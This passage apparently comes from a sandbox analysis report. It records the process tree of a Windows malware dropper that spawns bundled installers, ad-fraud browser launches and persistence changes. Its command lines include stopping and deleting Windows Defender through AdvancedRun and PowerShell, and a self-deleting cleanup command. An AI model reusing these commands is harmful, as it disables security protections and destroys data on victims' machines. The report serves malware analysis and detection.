C:\Users\Admin\AppData\Roaming\6440459.scr"C:\Users\Admin\AppData\Roaming\6440459.scr" /S9⤵
-
-
C:\Users\Admin\AppData\Roaming\7235880.scr"C:\Users\Admin\AppData\Roaming\7235880.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\5108028.scr"C:\Users\Admin\AppData\Roaming\5108028.scr" /S9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\1487741.scr"C:\Users\Admin\AppData\Roaming\1487741.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\3887265.scr"C:\Users\Admin\AppData\Roaming\3887265.scr" /S9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i1SR0Sa2ONI4aPlA1UigAn2R.exe"C:\Users\Admin\Pictures\Adobe Films\i1SR0Sa2ONI4aPlA1UigAn2R.exe"8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B4L33.tmp\0b5u9vmZhup2k81jwi8q31nK.tmp"C:\Users\Admin\AppData\Local\Temp\is-B4L33.tmp\0b5u9vmZhup2k81jwi8q31nK.tmp" /SL5="$103C4,506127,422400,C:\Users\Admin\Pictures\Adobe Films\0b5u9vmZhup2k81jwi8q31nK.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-Q3475.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-Q3475.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Media Player\ZHARYTEFIG\foldershare.exe"C:\Program Files\Windows Media Player\ZHARYTEFIG\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Users\Admin\AppData\Local\Temp\93-6ad3d-51b-04885-8417ec5add26b\Wymobelewa.exe"C:\Users\Admin\AppData\Local\Temp\93-6ad3d-51b-04885-8417ec5add26b\Wymobelewa.exe"11⤵
- Modifies system certificate store
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:213⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:313⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5472 /prefetch:213⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5324 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3268 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6224 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,6355915911402661535,1374671185947295179,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:113⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e60146f8,0x7ff8e6014708,0x7ff8e601471813⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d0-94aad-189-73fb7-323667f157f70\Leledykiki.exe"C:\Users\Admin\AppData\Local\Temp\d0-94aad-189-73fb7-323667f157f70\Leledykiki.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exeC:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mxhxi5sh.hub\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843842 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bp2c1ir2.ugc\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17256 -s 20414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exeC:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe /qn CAMPAIGN="654"13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pbwcobo5.thq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633843842 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exeC:\Users\Admin\AppData\Local\Temp\xhiwlltl.j0i\any.exe13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exeC:\Users\Admin\AppData\Local\Temp\o40rx25v.mfi\offer.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe"C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe"14⤵
- Loads dropped DLL
- Enumerates connected drives
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5432 & erase C:\Users\Admin\AppData\Local\Temp\Jzyjfnl.exe & RD /S /Q C:\\ProgramData\\248117682026473\\* & exit15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 543216⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe"C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe"14⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com15⤵
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run15⤵
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop WinDefend16⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse16⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
-
C:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exeC:\Users\Admin\AppData\Local\Temp\Qkepztzlpatffm.exe15⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exeC:\Users\Admin\AppData\Local\Temp\vxdwyeph.qka\cust2.exe13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ih2v5w42.lpz\gcleaner.exe /mixfive13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\xqfoxpvl.vsx\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsbABAF.tmp\tempfile.ps1"14⤵
-
-
